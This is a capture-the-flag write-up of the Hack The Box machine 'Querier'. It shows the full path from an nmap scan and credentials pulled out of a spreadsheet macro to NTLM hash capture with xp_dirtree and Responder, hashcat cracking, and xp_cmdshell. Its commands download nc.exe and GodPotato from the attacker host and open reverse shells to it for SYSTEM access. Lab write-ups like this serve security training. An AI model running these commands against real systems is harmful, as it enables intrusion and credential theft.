3 minute read

Querier

Reconnaissance

IP: 10.10.10.125

NMAP

nmap -T4 -p- -A 10.10.10.125

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-09 11:59 UTC
Nmap scan report for 10.10.10.125
Host is up (0.031s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-09-08T16:06:07
|_Not valid after:  2055-09-08T16:06:07
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-09-09T12:01:09+00:00; -3s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=9/9%OT=135%CT=1%CU=36843%PV=Y%DS=2%DC=T%G=Y%TM=68C0170
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=102%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=103%GCD=1%ISR
OS:=10A%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=106%GCD=2%ISR=109%TI=I%CI=I%II=I%SS
OS:=S%TS=U)SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M552NW8
OS:NNS%O2=M552NW8NNS%O3=M552NW8%O4=M552NW8NNS%O5=M552NW8NNS%O6=M552NNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M552NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-09-09T12:01:05
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -3s, deviation: 0s, median: -3s

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   29.94 ms 10.10.14.1
2   30.35 ms 10.10.10.125

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.40 seconds

SMB

Starting with smb

don’t know this extension but after using strings I spot it is sth like zip for exel files, so I started by using oletools (great python package for microsoft files)

olevba Currency\ Volume\ Report.xlsm

and I found database username and password

MsSQL

let’s try this credentials to connect to mssql

impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

Cannot find vector cmdshell not available so watched writeup and found this blog post: https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478

So I start responder and tried to capture mssql ntmlv2 hash using this poc

responder -I tun0 -A

exec master.sys.xp_dirtree '\\10.10.14.8\shares\es',1, 1

and I got ntlmv2 hash

Now attempt to crack hash

hashcat -m 5600 hash  /usr/share/wordlists/rockyou.txt

We got it MSSQL-SVC corporate568

Gaining Access

Tried smb and winrm but cannot connect, so I back to mssql login with new credentials and now attempt to use cmdshell

impacket-mssqlclient MSSQL-SVC:'corporate568'@10.10.10.125 -windows-auth

enable_xp_cmdshell

Great we have access to cmd, let’s make quick reverse shell. I started by uploading nc to target and then revshell via nc to my kali

xp_cmdshell powershell -c Invoke-WebRequest "http://10.10.14.8/nc.exe" -OutFile "C:\Windows\temp\nc.exe"

xp_cmdshell C:\Windows\temp\nc.exe 10.10.14.8 443 -e cmd.exe

and we got reverse shell, now grab your flag

Privilege Escalation

Before running winpeas I always start with whoami /priv and this time I was lucky

SeImpersonatePrivilege start with GodPotato Download it to machine

Invoke-WebRequest "http://10.10.14.8:81/GodPotato.exe" -OutFile "C:\Users\mssql-svc\desktop\god.exe"

And run, I used same rev shell as before ( also you can add users to administrators group, create new user, etc)

.\god.exe -cmd "C:\Windows\temp\nc.exe 10.10.14.8 443 -e cmd.exe"

We have system shell, now grab root.txt

Second and third method

Invoke-WebRequest "http://10.10.14.8/winPEASany.exe" -OutFile "C:\Users\mssql-svc\desktop\win.exe"

Insecure binpath and gppcredentials

both shown by winpeas

You May Also Enjoy